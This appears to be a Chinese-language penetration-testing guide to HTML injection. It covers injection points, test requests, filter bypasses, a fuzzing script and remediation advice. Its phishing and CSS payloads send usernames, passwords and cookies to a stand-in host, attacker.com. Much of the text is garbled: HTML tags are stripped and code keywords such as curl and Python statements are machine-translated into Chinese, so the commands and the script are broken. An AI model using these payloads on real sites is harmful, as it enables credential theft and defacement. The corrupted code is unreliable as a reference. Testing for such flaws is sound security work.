# HTML 注入测试 ## 目的识别并利用允许攻击者将恶意 HTML 内容注入 Web 应用程序的 HTML 注入漏洞。此漏洞使攻击者能够修改页面外观、创建网络钓鱼页面并通过注入表单窃取用户凭据。 ## 先决条件 ### 所需工具 * 带有开发工具的网络浏览器 * Burp Suite 或 OWASP ZAP * 篡改数据或类似代理 * cURL 用于测试有效负载 ### 所需知识 * HTML 基础知识 * HTTP请求/响应结构 * Web应用程序输入处理 * HTML注入和XSS的区别 ## 输出和可交付成果 1. **漏洞报告** \- 已识别的注入点 2. **利用证明** \- 演示内容操纵 3. **影响评估** \- 潜在的网络钓鱼和污损风险 4. **修复指南** \- 输入验证建议 ## 核心工作流程 ### 第 1 阶段：了解 HTML 注入当用户输入未经适当清理而反映在网页中时，就会发生 HTML 注入：

欢迎，

?name=

注入内容

欢迎，

注入内容

与 XSS 的主要区别： * HTML注入：仅渲染HTML标签 * XSS：执行JavaScript代码 * HTML 注入通常是 XSS 的垫脚石攻击目标： * 修改网站外观（污损） * 创建虚假登录表单（网络钓鱼） * 注入恶意链接 * 显示误导性内容 ### 第 2 阶段：识别注入点潜在注入面的地图应用： 1. 搜索栏和搜索结果 2.评论区 3. 用户个人资料字段 4. 联系表格和反馈 5. 登记表 6. URL参数反映在页面上 7. 错误信息 8. 页面标题和页眉 9.隐藏表单字段 10. 页面上反映的 Cookie 值常见漏洞参数：？名称= ？用户= ？搜索= ？查询= ？消息= ？标题= ？内容= ？重定向= ？网址= ？页= ### 第 3 阶段：基本 HTML 注入测试使用简单的 HTML 标签进行测试：

测试注入

粗体文本 斜体文本 带下划线的文本红色文字

注入的 DIV

插入段落

换行符点击此处合法链接

测试工作流程： # 测试基本注入卷曲“http://target.com/search?q=

测试

” # 检查 HTML 是否在响应中呈现卷曲-s“http://target.com/search?q=粗体”| grep -i “粗体” # 以 URL 编码形式进行测试卷曲“http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E” ### 第 4 阶段：HTML 注入的类型 #### 存储的 HTML 注入有效负载保留在数据库中：姓名：约翰·多伊简介：

网站正在维护中

请登录portal.company.com

很棒的文章！

<输入名称=“密码”类型=“密码”占位符=“密码：”> <输入类型=“提交”值=“登录”> #### 反射 GET 注入 URL 参数中的负载： http://target.com/welcome?name=

欢迎%20Admin

http://target.com/search?q=您的%20account%20has%20been%20compromied #### 反射后注入 POST 数据中的有效负载： # POST 注入测试 curl -X POST -d "comment=

恶意内容

" \ http://target.com/提交 # 表单字段注入 curl -X POST -d "name=&email=test@test.com" \ http://target.com/register #### 基于 URL 的注入注入显示的 URL： http://target.com/page/

已注入

http://target.com/users/

/profile ### 第五阶段：网络钓鱼攻击构建创建令人信服的网络钓鱼表单：

会话已过期

您的会话已过期。请重新登录。

<标签>用户名：

<标签>密码：

<输入类型=“提交”值=“登录”>

<风格> 输入 { 背景： url('http://attacker.com/log?data=') } <按钮>验证 URL 编码的网络钓鱼链接： http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A1 00%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%2 0action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22% 3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E ### 第 6 阶段：污损有效负载网站外观操纵：

被安全测试人员黑客攻击

<样式>正文{显示：无}

该网站已被盗用

检测到安全漏洞 ### 第 7 阶段：先进注射技术 #### CSS 注入 <风格> 正文 { 背景： url('http://attacker.com/track?cookie='+document.cookie) } .content { 显示：无 } .fake-content { 显示：块 }

内容

#### 元标记注入 #### 表单操作覆盖 <输入类型=“隐藏”名称=“额外”值=“数据”> #### iframe 注入 ### 第 8 阶段：绕过技术避开基本过滤器：

测试

<h1>编码</h1> %3Ch1%3EURL%20已编码%3C%2Fh1%3E 分割标签空字节 %253Ch1%253E双%2520编码%253C%252Fh1%253E \u003ch1\u003eUnicode\u003c/h1\u003e

将鼠标悬停在我的上方

### 第 9 阶段：自动化测试 #### 使用 Burp Suite 1. 捕获具有潜在注入点的请求 2. 发送给入侵者 3. 将参数值标记为负载位置 4.加载HTML注入词表 5. 开始攻击 6. 过滤渲染 HTML 的响应 7. 手动验证注入是否成功 #### 使用 OWASP ZAP 1. 爬取目标应用程序 2. 使用 HTML 注入规则进行主动扫描 3. 查看注射结果警报 4. 手动验证结果 #### 自定义模糊测试脚本 #!/usr/bin/env python3 导入请求导入 urllib.parse 目标=“http://target.com/search” 参数=“q” 有效负载= [ “

测试

”， “粗体”， “<脚本>警报（1）”， "

", "点击", "

样式

", “<字幕>移动”， “”， ] 对于有效负载中的有效负载：编码 = urllib.parse.quote(payload) url = f"{目标}?{参数}={编码}" 尝试：响应 = requests.get(url, 超时=5) 如果response.text.lower()中的payload.lower()： print(f"[+] 可能的注入：{payload}") elif 在response.text 中“

”或在response.text 中“”： print(f"[?] 部分反射: {payload}") 除了异常 e：打印（f“[-]错误：{e}”） ### 第 10 阶段：预防和补救安全编码实践： // PHP: 转义输出 echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8'); // PHP: 剥离标签回声 strip_tags($user_input); // PHP: 仅允许特定标签 echo strip_tags($user_input, '
'); # Python：HTML 转义从 html 导入转义 safe_output = escape(用户输入) # Python Flask：自动转义 {{ user_input }} # Jinja2 默认转义 {{ 用户输入 | safe }} # 标记为安全（危险！） // JavaScript：文本内容（安全）元素.textContent = 用户输入; // JavaScript:innerHTML（危险！） element.innerHTML = 用户输入； // 易受伤害的！ // JavaScript：清理 const clean = DOMPurify.sanitize(userInput); element.innerHTML = 干净；服务器端保护： * 输入验证（白名单允许的字符） * 输出编码（上下文感知转义） * 内容安全策略 (CSP) 标头 * Web应用程序防火墙（WAF）规则 ## 快速参考 ### 常见测试负载有效负载|目的 ---|--- `
测试
` |基本渲染测试 `粗体` |简单的格式化 `链接` |链接注入 `` |图片标签测试 `
` |样式注入 `` |表单劫持 ### 注入上下文背景 |测试方法 ---|--- 网址参数| `?param=
测试
` 表单字段 |使用 HTML 负载进行 POST Cookie 值 |通过 document.cookie 注入 HTTP 标头 |注入 Referer/User-Agent 文件上传 |含有恶意内容的 HTML 文件 ### 编码类型类型 |示例 ---|--- URL 编码 | `%3Ch1%3E` = `
` HTML 实体 | `<h1>` = `
` 双编码 | `%253C` = `<` 统一码 | `\u003c` = `<` ## 约束和限制 ### 攻击限制 * 现代浏览器可能会清理一些注入 * CSP可以阻止内联样式和脚本 * WAF 可能会阻止常见的有效负载 * 某些应用程序正确转义输出 ### 测试注意事项 * 区分HTML注入和XSS * 验证浏览器中的视觉效果 * 在多个浏览器中测试 * 检查存储与反映 ### 严重性评估 * 严重程度低于 XSS（不执行脚本） * 与网络钓鱼结合使用时影响更大 * 考虑污损/声誉损害 * 评估凭证被盗的可能性 ## 故障排除问题 |解决方案 ---|--- HTML 未呈现 |检查输出是否是 HTML 编码的；尝试编码变化；验证 HTML 上下文有效负载被剥离|使用编码变体；尝试标签分割；测试空字节；嵌套标签 XSS 不起作用（仅限 HTML）| JS 过滤但 HTML 允许；利用网络钓鱼表单、元刷新重定向

HTML 注入测试

包含技能